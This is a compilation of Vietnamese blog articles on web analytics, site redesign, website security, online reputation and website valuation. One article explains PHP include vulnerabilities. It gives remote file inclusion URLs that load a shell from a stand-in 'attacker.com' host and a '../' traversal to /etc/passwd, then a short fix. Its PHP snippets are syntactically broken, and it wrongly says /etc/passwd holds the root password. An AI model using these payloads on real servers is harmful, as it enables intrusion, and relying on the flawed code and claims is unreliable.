Không kể những phần mềm đã được dùng, các thông tin được giới phân tích trích dẫn sẽ giúp cải thiện công việc marketing của bạn. Một vài khách hàng tốt nhất của bạn có thể luôn luôn vào viếng thăm một khu vực nhất định trên website. Điều này có thể có nghĩa rằng khu vực đó cần phải được chú ý chăm chút hơn. Những khách hàng tốt nhất của bạn có thể dụng một số dịch vụ nhất định trên website. Những dịch vụ này nên được nhắc tới trong chiến dịch marketing của bạn. Họ có thể tìm kiếm nhiều thông tin hơn nữa cho một số sản phẩm cụ thể. Và có lẽ bạn nên đề cập đến những thông tin đó trong các bức thư chào hàng.
Tạp chí BCVT & CNTT

 
Up?

Theo dõi' người truy nhập để quản trị Website tốt hơn

By Công Ty Truyền Thông Số iGO

Làm sao có thể biết Website của bạn đang thực thi tốt công việc của nó? Câu trả lời bạn tìm kiếm có thể đã nằm ngay trên máy chủ của bạn. Bí mật nằm trong việc theo dõi cách thức khách hàng truy nhập website, nhờ đó người quản trị có thể biết được những nơi nào của Website thu hút khách hàng truy nhập và nơi nào không được khách hàng quan tâm.

Thuật ngữ được biết đến như là “phân tích web” (web analytics) không mô tả hết những công đoạn trong quá trình này. Đôi khi việc không tuân theo đúng “thủ tục” có thể khiến bạn mất đi những lợi thế rất lớn trong các hoạt động liên quan tới website.

Trước đây người ta thường chỉ quan tâm tới số lượt truy nhập (hit) và coi đó là chỉ số quan trọng duy nhất đánh giá sự phát triển của website. Tuy nhiên, hiện tại việc theo dõi sự truy nhập của khách hàng đã được nhìn nhận một cách toàn diện hơn nhiều và cho ta không ít con số thống kê. Nếu bạn nghiêm túc với những con số, kết quả thống kê sẽ hỗ trợ bạn đưa ra những quyết định sáng suốt nhất về thiết kế, nội dung, cấu trúc thông tin và sơ đồ điều hướng của website. Thông tin mà bạn có thể có bao gồm số hit của từng trang trong website, mức độ của các công cụ tìm kiếm trong việc lôi kéo người truy nhập tới website của bạn, thông tin về người truy nhập, hệ điều hành và trình duyệt họ đang sử dụng v.v… Với lượng thông tin phong phú như vậy, vấn đề nằm ở chỗ làm sao tận dụng tốt những thông tin đó.

Các bộ đếm miễn phí

Thông tin quan trọng hay vô ích tuỳ thuộc vào nhu cầu của bạn. Chẳng hạn, bạn muốn phát triển các tổ hợp từ khoá (keyword) để lôi kéo thêm người truy nhập hay cần đo lường mức độ hiệu quả của một chiến dịch quảng cáo: do đặt các banner quảng cáo, in địa chỉ Website trên các ấn phẩm hoặc đưa địa chỉ website lên các webite có liên quan.. Cũng có thể bạn muốn biết chính xác nội dung được nhiều người truy nhập nhất, số lượng lỗi phát sinh (theo phản hồi của người truy nhập). Biết được mình quan tâm tới những vấn đề nào bạn sẽ biết cần phải “đo lường” để lấy được những thông tin gì liên quan tới việc truy nhập của người sử dụng.

Quá trình phân tích website bắt đầu từ công việc giản đơn nhất là đong đếm “số hit”. Trên mạng hiện tồn tại không ít các “bộ đếm hit” (hit counter) miễn phí dành cho nhà quản trị. Có hai hình thức cài đặt “bộ đếm hit”: bộ đếm sử dụng qua các đoạn mã (script) được chèn vào các trang Web đặt trên máy chủ của bạn hoặc bộ đếm được “điều khiển từ xa” - đặt trên máy chủ khác. Nếu chỉ muốn đong đếm một trang (trang chủ), bạn nên lựa chọn phương pháp thứ hai. Trong khi đó, giải pháp đặt trực tiếp các đoạn mã đếm trên máy chủ của mình tiện lợi cho việc triển khai đồng loạt nhiều bộ đếm (để so sánh mức độ phổ biến giữa các trang). Ngoài ra, theo hình thức này bạn cũng có thể chủ động lựa chọn cho hiển thị hay không hiển thị kết quả đếm trên trang web.

Có rất bộ đếm tốt, miễn phí. Đầu tiên là WebCounter (http://www.digits.com), công cụ được coi là một trong những bộ đếm đầu tiên xuất hiện trên mạng, được phân phối dưới cả hai hình thức: tính năng cơ bản (miễn phí) và tính năng nâng cao (tính phí). Tiếp đến phải kể tới FastCounter (http://www.bcentral.com), đặc tính đong đếm mạnh và tin cậy. Nổi bật trong số các bộ đếm cho phép bạn cài đặt trên máy chủ của mình là Matt’s Counter (http://www.scriptarchive.com).

Điều khiển từ xa

Có rất nhiều bộ đếm phức tạp đến, từ thống kê số hit đơn giản và phân tích web theo chiều sâu. Các công cụ thống kê được host ở nơi khác cũng có thể cung cấp cho bạn hầu như mọi thông tin yêu cầu liên quan tới người truy nhập. Công việc mà bạn phải làm chỉ là đăng ký dịch vụ và copy và dán vài dòng mã lệnh lên trang. TheCounter.com là một ví dụ điển hình. Mức phí sử dụng bộ đếm của website này rất “bèo” (trước đây là miễn phí). Dịch vụ của TheCounter.com cung cấp không chỉ thống kê từng trang con mà còn cả con số trung bình trong từng ngày, thông tin tham khảo, chỉ số về độ phân giải màn hình, loại trình duyệt v.v…, tóm lại là những thông tin cần thiết để bạn điều chỉnh website theo nhu cầu người truy nhập. Dịch vụ khác (hoàn toàn miễn phí) là Extreme Tracker. Nó sẽ “nhúng” một đường dẫn tới trang cần thống kê của bạn và có thể hỗ trợ đo đếm nhiều trang (xem chi tiết tại http://www.extreme-dm.com).

Trước khi quyết định cài đặt hoặc đăng ký Extreme Tracker hoặc TheCounter, hãy kiểm tra gói thuê bao hosting của bạn. Nhiều nhà cung cấp dịch vụ hosting tích hợp sẵn các bộ đếm trong tài khoản của khách hàng.

Lựa chọn thống kê trong số hit là một chuyện, việc chắt lọc thông tin từ kho dữ liệu thu thập được trên toàn bộ website lại là chuyện khác. Chính vì vậy, trọng tâm ở đây dịch chuyển từ cách thức thu thập thông tin sang cách thức khai thác những thông tin đã thu thập được. Nếu bạn đã từng xem một tệp nhật ký (log file) nằm trong một máy chủ, bạn sẽ thấy tệp này là các chuỗi ký tự dài, lưu trữ thông tin về những lần truy nhập. Trong tệp tin là thông tin chi tiết về mỗi “hit”: chúng xuất phát từ đâu, kiểu truy vấn thông tin, trang truy nhập, trình duyệt gửi truy vấn, thời gian gửi truy vấn v.v… Có thể bạn sẽ phải trả thêm tiền nếu muốn tiếp cận các log file trong các máy chủ. Một số nhà cung cấp dịch vụ thậm chí không cho phép khách hàng tiếp cận trực tiếp (thời gian thực) các log file.

Chắt lọc thông tin có nghĩa từ các nguồn dữ liệu thô sẽ là điều không tưởng nếu chỉ dùng phương pháp thủ công. Bạn cần các ứng dụng phần mềm phân tích có khả năng tổ chức và sắp xếp thông tin dưới dạng các con số thống kê dễ hiểu. Một khi có được sự hỗ trợ này, bạn sẽ tìm thấy những thông tin hữu dụng mà trước đó thậm chí bạn chưa từng biết tới sự tồn tại của chúng chứ chưa nói là muốn có. AWStats là một ví dụ tuyệt vời về ứng dụng phân tích web. ứng dụng này sử dụng mã CGI để sản sinh ra những biểu đồ, bảng biểu minh hoạ… trực quan cho số liệu thống kê lấy ra từ những log file. Ngoài ra, Analog cũng là một lựa chọn miễn phí cho bạn. Công cụ này tích hợp ít tính năng hơn AWStats nhưng lại cho phép người sử dụng tự điều chỉnh cấu hình từ máy địa phương (local machine). Trong khi AWStats yêu cầu bạn phải xác định đường dẫn tới log file trước khi chạy, Analog cho phép bạn xác định log file khi chương trình đang thực thi. Điều này có nghĩa là bạn có thể sử dụng Analog để đọc các log file trực tiếp trên các máy chủ (live log).

Thêm một ứng dụng khác, Sawmill, cũng dựa vào CGI, có khả năng chạy trực tiếp từ website hoặc máy tính của bạn nhờ một máy chủ web (web server) được tích hợp sẵn trong công cụ. Khác AWStats và Analog, Sawmill là sản phẩm mang tính thương mại. Sawmill hỗ trợ rất nhiều tính năng phân tích và nhiều lựa chọn so với các ứng dụng miễn phí. Một trong những tính năng đặc sắc nhất của Sawmill là khả năng theo dõi và phân tích web trực tiếp (live web tracking).

Các chuyên gia phân tích web phân biệt khá rạch ròi quá trình theo dõi (tracking) và phân tích log file. Quá trình theo dõi web có thể mang lại những dữ liệu tương tự nhưng theo phương thức khác. Trong khi các log máy chủ lưu trữ mọi truy vấn gửi tới trang máy chủ web, máy chủ FTP hay máy chủ email…, các dịch vụ theo dõi chỉ lưu trữ những động thái xuất phát trực tiếp từ người sử dụng (lưu trữ vào cookie rồi chuyển tới cơ sở dữ liệu). Số liệu thống kê qua công cụ phân tích log file mang tính so sánh (nhiều thời điểm), trong khi các công cụ theo dõi chỉ cung cấp thống kê ở một thời điểm cụ thể. Ngoài ra, các tệp tin log còn lưu trữ những thông tin mà các ứng dụng theo dõi website không để ý tới như sự hiện diện của “khách quen”, người truy nhập từ cùng một địa chỉ IP hoặc hoạt động tìm kiếm của các công cụ tìm kiếm (search engine).

Theo dõi theo dòng truy nhập

Những ứng dụng này còn có thể lưu lại các bước người truy nhập truy nhập website của bạn. Clickstream hay Clickpath – dòng truy nhâp, cho thấy mức độ hiệu quả của sơ đồ điều hướng, khả năng thu hút người truy nhập vào các lớp bên trong trang web. Đương nhiên, bạn cũng có thể nắm bắt được phần nào một dòng truy nhập thông qua các log file nhưng kết quả thường không đầy đủ và chính xác.

Để có được các thông tin về dòng truy nhập, nhà quản trị cần cài đặt các cookie, nhúng dữ liệu vào cookie để rồi sau đó tiến hành phân tích từ những dữ liệu thu thập được. Chính vì vậy, đa phần các ứng dụng theo dõi web đều được host từ máy chủ của các nhà cung cấp dịch vụ. Trong số các ứng dụng đã từng được đề cập, Extreme Tracker là một công cụ rất cơ bản nếu đem so sánh với các ứng dụng chuyên nghiệp. OpenTracker (http://www.opentracker.net) được cung cấp ở mức phí, 16,95 USD/tháng, nhưng lại tích hợp rất nhiều tính năng. Dữ liệu thu thập được cho phép bạn tối ưu các trang web để tăng vị trí trong các kết quả tìm kiếm, cải thiện sơ đồ điều hướng và cấu trúc thông tin của website.

Ví dụ, bạn có thể phát hiện ra rằng người truy nhập chỉ vào một khu vực cụ thể trên website rồi truy xuất. Với các công cụ theo dõi web, bạn sẽ nắm bắt được nguyên nhân chung nhất của tình trạng này để đưa ra các biện pháp khắc phục.

Nếu thực sự muốn thành công hơn nữa trên mạng Internet, bạn nên nghiêm túc với những giải pháp đã được đề cập tới ở trên. Trong mọi trường hợp, viện tới tư vấn của các nhà cung cấp dịch vụ ứng dụng (Application Service Provider- ASP) như http://www.webtrends.com. Các công ty thứ ba này sẽ làm công việc theo dõi, phân tích website cho bạn; đưa ra những đề xuất cụ thể với những thông tin thu thập được. Đương nhiên, ngay cả khi bạn chỉ dụng một bộ đếm hit đơn giản hoặc cả một hệ thống theo dõi và phân tích website (tính phí), hiệu quả hay không vẫn tuỳ thuộc vào mức độ chủ động của bạn.

(Theo Tạp chí BCVT & CNTT - VDC)

 
Up?

Làm mới website

By Công Ty Truyền Thông Số iGO

Chúng ta đang sống trong một thế giới trực tuyến và việc người khác tìm kiếm bằng Google để vào được trang web của bạn một cách thường xuyên là một cách làm góp phần tạo nên sự nổi tiếng của doanh nghiệp của bạn. Do đó, có thể nói nếu công ty nào chưa tạo được một trang web, thì nó đang lạc hậu với thời cuộc. Còn những ai chưa thật sự hài lòng với những gì mình đã tạo trên website thì cũng đã đến lúc bắt đầu làm mới lại khuôn mặt của mình trên mạng.

Dưới đây là những gợi ý hữu ích:

1. Hãy tìm đến một trang web mà bạn ngưỡng mộ hay yêu thích về cách trình bày đặc biệt là sự ấn tượng và tính dễ dàng sử dụng của nó. Hãy xem xét và chỉ ra điều gì khác thường và sáng tạo của trang web đó và tìm hiểu cách vận hành những ứng dụng như thế nào để đến được với một khách hàng như bạn. Từ đó bạn sẽ có chìa khóa để mở hướng đổi mới.

2. Cần nêu rõ ràng những giá trị của bạn. Nếu khả năng viết lách của bạn chưa đủ cao, hãy mướn một nhà quảng cáo thực hiện thay công việc này để truyền bá những thông tin có ích với một giọng điệu phù hợp với văn hóa trong công ty bạn.

3. Dành thời gian để nâng cao tính hiện hành của website. Hãy tra cứu website của mình một cách định kỳ để biết được đâu là nơi có thể cập nhật những câu chuyện hay những mẩu tin mới. Viết blog là một cách hỗ trợ để tạo nên những mẫu nội dung mới một cách thường xuyên và chính điều này sẽ góp phần nâng cao thứ hạng của bạn trong những công cụ tìm kiếm trực tuyến, giúp tăng được đáng kể số lượt cập nhật vào trang web.

4. Hãy ngừng nêu lên những lý do và bắt đầu ngay công việc làm mới website của mình. Nếu bạn không có đủ thời gian, hãy đi thuê một chuyên viên IT để thực hiện công việc này.

5. Nên tìm kiếm một đối tác về các dịch vụ website đáng tin để có thể chia sẻ những kinh nghiệm. Điều này sẽ giúp việc làm mới website hiệu quả hơn, thú vị hơn.

Với tốc độ phát triển website ngày càng mạnh mẽ, (từ phiên bản 2.0 sang 3.0 có lẽ chẳng bao lâu nữa) “website hóa” công việc làm ăn là một cách thông minh để nâng trình độ và tầm vóc của các doanh nghiệp.

Gia Trịnh theo Entrepreneur

 
Up?

Bảo mật máy chủ web: Lỗi Include và cách khắc phục

By Công Ty Truyền Thông Số iGO

Đôi khi vào các trang hacker , bạn hay thấy các lỗi bảo mật mà hacker đã dùng những cách thức hết sức đơn giản để lấy username và password vào root của host như ../../../../../ ect/passwd. Đó chính là một phần của lỗi include. Nói một cách tổng quát, lỗi include là một loại lỗi do sự bất cẩn khi lập trình gây ra và lỗi này có thể khắc phục một cách dễ dàng.

Include là gì? Include nghĩa là kết nối, lien kết . Để tránh việc lặp đi lặp lại một đoạn mã nào đó, lập trình viên chỉ cần dùng lệnh include đến một file có chứa mã sẵn . Vì thế, trong một mã nguồn ( tin tức, diễn đàn, âm nhạc…) có chứa rất rất nhiều các lệnh Include. Và trong hàng ngàn dòng lệnh thì sai sót ở những nơi không mấy quan trọng là điều không thể tránh.

Dựa vào hình thức chúng ta có thể phân ra 2 loại: remote file và local.

I. Lỗi remote file

a/ Lỗi khai báo biến:

Vd1: Ta có một file exam1.php như sau:

$mkdir=”/home”;
Include($mkdir/config.php);
[…code exam1.php] ?>

Ta thấy rằng file này không có lỗi. Trước tiên lập trình viên (LTV) khai báo biến $mkdir là “/home”. Sau đó LTV dùng lệnh include với đường dẫn đến file config.php là giá trị đã khai báo ở biến $mkdir.
Vd2: Tôi lại có một file exam2.php như sau:

$mkdir =” “;
Include($mkdir/config.php);
[…code exam2.php] ?>

Đã có lỗi xảy ra. Vì file config.php nằm chung một thư mục với file exam2.php nên không cần khai báo biến $mkdir. Biến $mkdir đã không còn có tác dụng và trở nên vô nghĩa. Tuy nhiên LTV lại quên không xoá đi mà lại để nó tồn tại.

Vd3 Quay lại vd 1

$mkdir = “/home”;
Include($mkdir/config.php);
[…code exam1.php] ?>
Giả sử tôi có file config.php như sau:
$datatype =”mysql”;
$datahost =”localhost”;
$data.user =”admin”;
$data.name =”test”; ?>

File exam1.php đã include đến file config.php. Với lệnh include này thì hai file trên sẽ tương đương với 1 file như sau:

$datatype =”mysql”;
$datahost =”localhost”;
$data.user =”admin”;
$data.name =”test”;
[…code exam1.php] ?>

Ở đây đoạn từ $mkdir=…config.php ; đã được thay bằng nội dung file config.php

Vd4: Quay lại với vd2, exam2.php:

$mkdir =” “;
include($mkdir/config.php);
[…code exam2.php]
?>

File này có lỗi. Biến $mkdir để trống không khai báo. Điều này đã tạo cơ hội cho attacker khai báo dùm.
Nếu attacker dùng địa chỉ như sau: http://victim.com/exam2.php?mkdir=http://attacker.com.
File exam2.php của victim lúc này sẽ như sau:

$mkdir= “http://attacker.com”;
Include (http://attacker.com/config.php);
[…code exam2.php] ?>

Trong trường hợp này thì file config.php đã nghiễm nhiên được coi như là nằm trong host của attacker và nếu nội dung file này là một con remview thì sẽ có vấn đề xảy ra. Như vd3 đã nói với lệnh include này, toàn bộ mã của file chứa remview đã nằm gọn trong file exam2.php. Như vậy là attacker đã dùng remview để điều khiển toàn bộ host của victim.

Tuy nhiên việc này chỉ xảy ra ở máy attacker, còn những người truy cập khác đều không có tác dụng và thực chất file exam2.php trên host victim cũng không hề bị thay đổi.

b/ Lỗi khi dùng hàm isset và hàm if

Vd5 Ta có một file exam5.php như sau:

If (!$mkdir) ($mkdir=”config.php”)
Include($mkdir);
[…code exam5.php]
?>

Nghĩa là nếu biến $mkdir chưa được khai báo thì lấy giá trị mặc định là config.php và include đến giá trị mà biến $mrdir đã khai báo.

Tương tự như vd4 attacker lại khai báo dùm biến $mkdir cho victim và …
Vd6 : Lại một file exam6.php

Isset (!$patch) ($patch=”/home”);
Include($patch);
[…code exam6.php]
?>

Nếu biến $patch chưa được khai báo thì lấy giá trị mặc định là /home
Bây giờ đến lượt các bạn tự tìm hiểu

II. Lỗi local

Chúng ta chỉ xét một trường hợp duy nhất ; exam.php:
$file =” “;
Include (/home/$file);
[…code exam.php]
?>

Vẫn tương tự như sau các ví dụ trước nhưng chỉ khác ở chỗ biến $file đã bị giới hạn nằm trong thư mục home.
Nếu attacker nhập vào:
http://victim.com/exam.php?file=http://attacker.com thì code trên thành như sau :

File =”http://attacker.com”) ;
Include (/home/http://attacker.com);
[…code exam.php]
?>

Lệnh include không còn có ý nghĩa vì đường dẫn sai hoàn toàn. Nhưng attacker vần tận dụng được lỗi này. Bằng cách thêm vào đường dẫn như sau :
http://victim.com/exam.php?file=../../../../../etc/passwd/
Với giá trị nhập vào là ../ attacker đã xhayj ngược ;liên kết đến thư mục password của server host .
Vd: chúng ta có cài thư mục như sau:
Server root/home/victim/public.html/forum/includes/exam.php
Với 5 lần sử dụng ../ đã giúp attacker xâm nhập vào thư mục etc/passwd : nơi chứa pass vào root của server.
Tuỳ mỗi server mà có đường dẫn khác nhau mà dùng số lần ../ khác nhau.

III. Cách khắc phục

Đây là lỗi sinh ra do vô ý hoặc do kém hiểu biết về lập trình. Tuy nhiên việc fix lỗi lại rất dễ dàng, chỉ cần loại bỏ các biến không cần thiết khi dùng lệnh include hoặc phải khai báo biến rõ ràng. Qua lỗi này, chúng ta có thể tự bảo mật cho chính website của bản than và tự tìm kiếm các lỗi khác.

(Theo vip4rum.us)

 
Up?

Bảo vệ website

By Công Ty Truyền Thông Số iGO

Hacker tấn công vào các website của các tổ chức, đặc biệt là các doanh nghiệp thương mại điện tử chủ yếu để khai thác lỗ hổng nhằm kiểm soát website hoặc tấn công tên miền nhằm chuyển hướng người duyệt web sang một website khác.

Nguy cơ từ các lỗ hổng

Các trang tin thông tin điện tử giờ đây không chỉ đơn thuần là một website thông tin, quảng bá thông thường mà chúng đã và đang chuyển thành các ứng dụng chạy trên nền web. Các ứng dụng web này được xây dựng trên nhiều thành phần và chạy trên các máy chủ khác nhau: máy chủ web, máy chủ ứng dụng và máy chủ cơ sở dữ liệu,...

Cần đầu tư đồng bộ giữa hạ tầng thông tin và hệ thống bảo vệ. Nếu hệ thống vẫn tồn tại những nguy cơ chưa được bảo vệ thì có thể đó sẽ là điểm yếu để tin tặc, thậm chí những đối thủ cạnh tranh lợi dụng để tấn công.

Hacker khi tấn công vào một website có thể nhằm vào một trong các mục đích thay đổi diện mạo trang chủ, thay đổi một phần hoặc toàn bộ website hay tấn công từ chối dịch vụ làm cho website không còn khả năng phục vụ. Các cuộc tấn công này gây nhiều tổn thất cho doanh nghiệp do uy tín có thể bị suy giảm, thông tin trong giao dịch trực tuyến hoặc giao dịch ngân hàng sai lệch, thông tin nhạy cảm như: tài khoản, thẻ tín dụng, thông tin truy nhập vào hệ thống... trong quá trình thực hiện các giao dịch trực tuyến bị đánh cắp

Thời gian gần đây, số vụ tấn công đánh cắp thông tin đang có chiều hướng gia tăng và phòng cảnh sát phòng chống tội phạm công nghệ cao (C15, Bộ Công an) đã phát hiện và khởi tố một số vụ.

Điểm yếu của website ngày nay rất đa dạng. Trung bình mỗi tuần có hơn 30 bản vá cho các lỗ hổng bảo mật được phát hành thì có tới 75% các điểm yếu tập trung vào lỗi phát triển các ứng dụng web. Một trong số các nguyên nhân dẫn đến số lỗi bảo mật trên ứng dụng web là do các website được thuê gia công thường sử dụng chung mã nguồn hoặc tận dụng các mã nguồn miễn phí trên Internet mà không được chỉnh sửa một cách đúng mức, trong khi các lỗ hổng trong các mã nguồn miễn phí này cũng được công bố trên Internet khiến cho nguy cơ bị tấn công càng cao hơn.

Ba lớp bảo vệ website


1. Vành đai bảo vệ chung cho toàn hệ thống mạng (lớp 1), gồm cả hệ thống web.

Để triển khai lớp bảo vệ đầu tiên này, các tổ chức, doanh nghiệp có thể trang bị một thiết bị an ninh tích hợp (UTM) gồm nhiều tính năng bảo mật khác nhau như:

• Tường lửa (Firewall) sẽ giúp ngăn chặn các tấn công tầng mạng, loại bỏ các hành vi dò quét các điểm yếu bảo mật của các hệ điều hành trên các máy chủ

• Thành phần ngăn chặn xâm nhập (IPS) giúp loại bỏ các tấn công khai thác các điểm yếu của phần mềm ứng dụng web, phần mềm cơ sở dữ liệu, hệ điều hành... Ngoài ra các thành phần mạng riêng ảo (VPN) và thành phần quét virus mức gateway sẽ giúp hệ thống được an toàn hơn.

2. Tường lửa chuyên dụng cho các ứng dụng web

Sau khi xây dựng vành đai bảo vệ chung, cần trang bị thêm một tường lửa chuyên dụng cho các ứng dụng web (lớp 2). Tường lửa ứng dụng web này sẽ kiểm tra và ngăn chặn các tấn công khai thác điểm yếu phát sinh trong quá trình phát triển website. Tùy thuộc vào quy mô của tổ chức, doanh nghiệp và/hoặc phụ thuộc vào giá trị của tài nguyên thông tin trên website mà có thể có một mức đầu tư tương ứng cho tường lửa ứng dụng web này. Có 3 lựa chọn:

• Đối với các website mà phần lớn là thông tin tĩnh (ít thay đổi), không chứa các dữ liệu quan trọng cũng như không có các giao dịch mua bán: có thể trang bị bổ sung module phần mềm tường lửa cho ứng dụng web (như Web Intelligence của Check Point) vào thiết bị an ninh tích hợp UTM nói trên.

• Đối với các website có rất nhiều dữ liệu quan trọng mang tính chất sống còn của tổ chức, doanh nghiệp, đồng thời thường xuyên diễn ra các giao dịch trực tuyến, đòi hỏi phải có độ an toàn, sẵn sàng cao: nên trang bị một thiết bị tường lửa chuyên dụng cho ứng dụng web (như giải pháp của NetContinuum, một hãng chuyên cung cấp thiết bị tường lửa chuyên dụng cho ứng dụng web).

• Đối với các website cung cấp các thông tin nội bộ hoặc cổng truy nhập thông tin của một tổ chức, doanh nghiệp (Web Portal) cho phép nhân viên kết nối vào từ bất cứ đâu và làm việc bất kể thời gian nào: ngoài việc trang bị lớp bảo vệ chung bằng thiết bị an ninh tích hợp, các tổ chức, doanh nghiệp cũng cần xây dựng một “cổng truy nhập” an toàn đến các tài nguyên thông tin (ví dụ sử dụng thiết bị Connectra Web Security Gateway của Check Point).

Song song tường lửa chuyên biệt cho các ứng dụng web, các tổ chức, doanh nghiệp cũng cần trang bị các giải pháp xác thực mạnh cho ứng dụng web quan trọng. Một giải pháp xác thực mạnh phải xác thực 2 yếu tố trở lên. Thông thường, các giải pháp xác thực mạnh truyền thống sẽ đòi hỏi hàng trăm đô-la đầu tư cho mỗi một người dùng, như vậy sẽ rất tốn kém trong việc đầu tư. Hiện nay, giải pháp xác thực mạnh IdentityGuard của Entrust sẽ giúp các tổ chức, doanh nghiệp giải quyết bài toán này với một chi phí tối ưu.

Những việc cần phải thực hiện sau khi website bị tấn công:
• Tách hệ thống bị tấn công khỏi mạng, đề phòng hacker vẫn tiếp tục phá hoại trong quá trình khắc phục.
• Phân tích các log trên hệ thống để tìm hiểu cách thức khai thác của hacker nhằm đưa ra biện pháp phòng chống thích hợp.
• Cấu hình lại hệ thống mạng và máy chủ chặt chẽ.
• Kiểm tra lại mã nguồn website để vá các lỗ hổng do lập trình.
• Rà soát máy chủ, đề phòng tin tặc đã cài được webshell (1 dạng backdoor). Nếu không sớm phát hiện ra webshell, hệ thống máy chủ rất dễ bị tấn công trở lại cho dù đã khắc phục được lỗ hổng.
3. Thiết bị an ninh tích hợp hoặc thiết bị chống xâm nhập mạng

Sau khi đầu tư hai lớp bảo vệ trên, để tăng cường an toàn bảo mật thông tin, tổ chức, doanh nghiệp có thể bổ sung thêm một thiết bị an ninh tích hợp hoặc thiết bị chống xâm nhập mạng (IPS) chuyên dụng (lớp 3). Lớp này phân chia mạng bên trong thành các phân vùng khác nhau và áp dụng các chính sách riêng cho từng phân vùng mạng nhằm ngăn chặn các tấn công có nguồn gốc từ bên trong mạng và loại bỏ các tấn công có thể vượt qua tường lửa vào vùng các máy chủ quan trọng.

Thay lời kết

Việc đầu tư và triển khai một hệ thống bảo vệ cho ứng dụng web là rất cần thiết, tuy nhiên cần phải đầu tư một cách đồng bộ giữa hạ tầng thông tin và hệ thống bảo vệ. Nếu hệ thống vẫn còn tồn tại những nguy cơ chưa được bảo vệ thì có thể đó sẽ là các điểm yếu để tin tặc, thậm chí những đối thủ cạnh tranh lợi dụng để tấn công, và hậu quả khó có thể lường trước được. Song song với việc đầu tư về công nghệ, các tổ chức, doanh nghiệp cũng cần xây dựng riêng cho mình một chính sách an toàn thông tin và một đội ngũ quản trị có kinh nghiệm để duy trì và vận hành hệ thống.

(Theo iGuru)

 
Up?

DN cần chú trọng bảo vệ uy tín trực tuyến

By Công Ty Truyền Thông Số iGO

Hãng nghiên cứu thị trường Gartner khuyến cáo doanh nghiệp (DN) cần phải chủ động chú trọng hơn nữa trong việc bảo vệ uy tín trên mạng Internet bởi môi trường kinh doanh trực tuyến ngày càng tiềm ẩn nhiều nguy cơ hơn.

Gartner dự báo đến cuối năm 2010 tội phạm mạng có thể sẽ chuyển sang hướng sử dụng Internet để đe doạ tống tiền tổ chức doanh nghiệp hoặc đe doạ gây phương hại đến uy tín của doanh nghiệp bằng cách điều khiển những yêu cầu tìm kiếm trực tuyến trả về những kết quả sai trái.

“Nếu doanh nghiệp của bạn có một uy tín tốt trên mạng Internet và bạn phải dựa vào đó để tiến hành công việc kinh doanh thì sẽ không còn một cách nào khác là bạn phải chủ động quản lý và bảo vệ uy tín đó hơn nữa,” ông Jay Heiser – Phó chủ tịch phụ trách nghiên cứu của Gartner – cho biết.

“Thông tin trên Internet được nhân bản và phát tán bằng một tốc độ đáng sợ. Chúng ta gần như không thể xoá bỏ hết được nó. Nếu đó là một thông tin không tốt thì có thể nói là thật sự nguy hiểm đối với uy tín doanh nghiệp”.

Ông Heiser cho biết mặc dù hiện có rất nhiều nguồn tài nguyên thông tin về uy tín trực tuyến cũng như những đơn vị sẵn sàng hỗ trợ doanh nghiệp trong việc quản lý uy tín trực tuyến – như các tổ chức PR hoặc các hãng phân tích – song hầu hết các doanh nghiệp đều chưa có được một cơ chế “phân tích và cảnh báo” dành riêng cho việc quản lý bảo vệ uy tín trên mạng Internet.

“Các duy nhất để chống lại sự tồn tại và phát tán các thông tin có ảnh hưởng không tốt tới uy tín của doanh nghiệp trên mạng Internet cũng chính là Internet. Trong những trường hợp như thế buộc lòng doanh nghiệp phải tung lên mạng một khối lượng thông tin tốt lớn, đàn áp lại thông tin xấu. Đó chính là lĩnh vực quản lý uy tín trực tuyến”.

Ông Heiser khuyến cáo doanh nghiệp nên chủ động hơn nữa trong việc quản lý và bảo vệ uy tín trực tuyến của mình, tiến hành những bước đi cần thiết nhằm hiểu rõ vai trò của uy tín đối với các mối quan hệ xã hội và thương mại, và song song bên cạnh đó là hợp tác chặt chẽ với các hãng PR nhằm tạo ra một chiến lược bảo vệ uy tín hiệu quả.

Ngoài ra các doanh nghiệp cũng cần phải tiến hành đào tạo nhân viên của mình về phương thức đánh giá uy tín doanh nghiệp và tìm kiếm các cơ hội kinh doanh nhằm gia tăng uy tín cho doanh nghiệp.

Nguồn tin: Quản Trị Mạng

 
Up?

Định giá vùng Web, các công ty dịch vụ thông tin nên tập thói quen này

By Công Ty Truyền Thông Số iGO

Đảo quanh các hệ thống Web lớn tại Việt Nam tôi thấy có một sự đầu tư vùng dịch vụ không có chiến lược dài hạn. Sự thành công của các dự án Web trên thế giới tác động khá mạnh đến định hướng sản phẩm của các công ty Việt Nam.

Những hệ thống như www.aha.vn, www.clip.vn, www.marofin.com, www.chodientu.vn đang trở thành con tốt thí cho những gã khổng lồ cẩn thận núp trong bóng tối thay vì đại diện cho một làn sóng kinh doanh mới tại Việt Nam.

Đảo quanh các hệ thống Web lớn tại Việt Nam tôi thấy có một sự đầu tư vùng dịch vụ không có chiến lược dài hạn. Sự thành công của các dự án Web trên thế giới tác động khá mạnh đến định hướng sản phẩm của các công ty Việt Nam. Những hệ thống như www.aha.vn, www.clip.vn, www.marofin.com, www.chodientu.vn đang trở thành con tốt thí cho những gã khổng lồ cẩn thận núp trong bóng tối thay vì đại diện cho một làn sóng kinh doanh mới tại Việt Nam.

Nhẩm một con tính đơn giản, mỗi hệ thống tốn không dưới 2 tỉ nếu hoạt động khoảng 2 năm. Thành công của những Google, Yahoo, Flickr làm tôi thấy cảnh giác trước sức mạnh của phương tiện truyền thông. Liệu các công ty hăm hở cưỡi trên làn sóng kinh doanh mới có kéo dài tên tuổi đến khi TMĐT Việt Nam chín muồi hay không?

Định giá vùng Web là một lĩnh vực tôi mới quan tâm; sau lần tham quan www.timnhanh.com tôi chợt nhận ra giá vùng Web có mối tương quan với sự phát triển của Web. Định giá vùng Web cũng có thể coi là định giá bất động sản trong Web site.

Một vùng Web có những mục đích sau:
  • Thu tiền gián tiếp (Cung cấp thông tin tới người đọc, mang đặc điểm tin tức, PR cho doanh nghiệp/ sản phẩm/ dịch vụ, xúc tiến Thương mại, dịch vụ công)
  • Thu tiền trực tiếp (Kinh doanh trực truyến)
Như chúng ta biết để định giá một Website chúng ta có thể áp dụng trong những cách sau:
  • Lưu lượng truy cập hay PageRank
  • Định giá dựa trên thu nhập
Lưu lượng truy cập, là một chỉ số tốt nhưng nó không thể hiện hoàn toàn giá trị tiền bạn có thể đạt được. Giá của nó phụ thuộc vào định giá của bạn cho tương lai của Web site

Định giá dựa trên thu nhập, phương thức này khác phức tạp. Bạn dựa trên sự thành công trong kinh doanh của Web. 2 x (Lợi nhuận thuần hàng năm) + (giá trị tài tài sản).

Tài sản = tên miền + phần mềm + giá trị nội dung, rồi nhân với 2 năm hoặc 24 tháng.

